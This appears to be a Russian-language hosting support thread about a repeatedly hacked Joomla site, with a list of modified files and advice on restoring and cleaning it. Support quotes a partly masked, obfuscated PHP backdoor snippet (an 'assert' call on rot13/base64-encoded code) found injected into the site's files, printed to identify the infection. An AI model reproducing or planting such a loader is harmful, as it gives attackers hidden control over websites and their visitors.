Варианты решения Ваших вопросов

все тоже. снова взлом

мы проверяем сайт на вирусы. зайдите в админку и смените тему сайта

отчет

http://mera-tlt.ru/AI-BOLIT-REPORT-__-******-**-**-****_**-**.html

вот список файлов менявшихся сегодня

./index.php
./cli/finder_indexer.php
./plugins/system/ossystem/form/fields/customfooter.php
./plugins/system/nnframework/fields/header.php
./administrator/index.php
./administrator/components/com_modules/views/modules/tmpl/default_batch_footer.php
./administrator/components/com_menus/views/items/tmpl/default_batch_footer.php
./administrator/components/com_tags/views/tags/tmpl/default_batch_footer.php
./administrator/components/com_newsfeeds/views/newsfeeds/tmpl/default_batch_footer.php
./administrator/components/com_osmeta/form/fields/customfooter.php
./administrator/components/com_users/views/users/tmpl/default_batch_footer.php
./administrator/components/com_redirect/views/links/tmpl/default_batch_footer.php
./administrator/components/com_content/views/articles/tmpl/default_batch_footer.php
./administrator/components/com_banners/views/banners/tmpl/default_batch_footer.php
./administrator/components/com_finder/helpers/indexer/indexer.php
./administrator/components/com_finder/controllers/index.php
./administrator/components/com_finder/models/index.php
./administrator/components/com_finder/models/indexer.php
./administrator/components/com_osmap/form/fields/customfooter.php
./administrator/components/com_contact/views/contacts/tmpl/default_batch_footer.php
./administrator/components/com_categories/views/categories/tmpl/default_batch_footer.php
./administrator/templates/isis/index.php
./administrator/templates/system/index.php
./administrator/templates/hathor/index.php
./administrator/templates/web*easy/index.php
./administrator/templates/web*easy/index--w*e.php
./uploads/_thumbs/*ef***.php
./libraries/cms/form/field/headertag.php
./libraries/joomla/document/html/renderer/head.php
./modules/mod_menu/tmpl/default_heading.php
./modules/mod_footer/mod_footer.php
./layouts/joomla/modal/footer.php
./layouts/joomla/modal/header.php
./components/com_jcomments/tpl/default/tpl_index.php
./components/com_jce/editor/libraries/views/plugin/index.php
./templates/mera-tlt/index.php
./templates/protostar/index.php
./templates/beez*/index.php
./templates/__mera-tlt.old/index.php
./templates/system/index.php

вот это вирус, ./uploads/_thumbs/*ef***.php
 видно даже невооруженным взглядом

да, есть. но это не решит проблему. после восстановления проверьте сайт и смените все пароли. проверьет пользователей и компоненты сайта

мы восстановили. в бекапе тоже самое.

попробуйте сменить тему сайта

в бекапе тоже самое.     mera-tlt.ru это уже восстанволеный из бекапа сайт. сейчас еще раз выполним проверку и предоставим отчет. зайдиет в админкуи  смените тему сайту

у вас в файлах сайта вот такие вставки

//###==###
error_reporting(*); ^M
$strings = "as";$strings .= "sert";^M
@$strings(str_rot**('riny(onfr**_qrpbqr("nJLtXTymp*I*XPEcLaLcXFO*VTIwnT*tWTyvqwftsFOyoUAyVUgcMvtuMJ*jqUxbWS*QG**YFHIoVzAfnJIhqS*wnTIwnlWqXFyxnJHbW
//###==###

других бекапов к сожалению нет. утоните название темы сайта

причме файлы эти менялись еще в феврале

у вас и во всеъх модулях сайтатакие вставки. еще с февраля и января месяца. вы не очистилисайт после заражения и поэтом сайт был заражен повторно

сайт мы запустили Вам. теперь проверяйте все файлв и удаляйте из них код. скачайте файлы сайта на свой компьтер и проведите поиск по тексту файлов

Уточните IP сотрудников.

Сообщите как только узнаете.

сотрудники ревизиум сами поставят свои ip. так же сообщие им что Вы с ERA Host, Вам предоставят скидку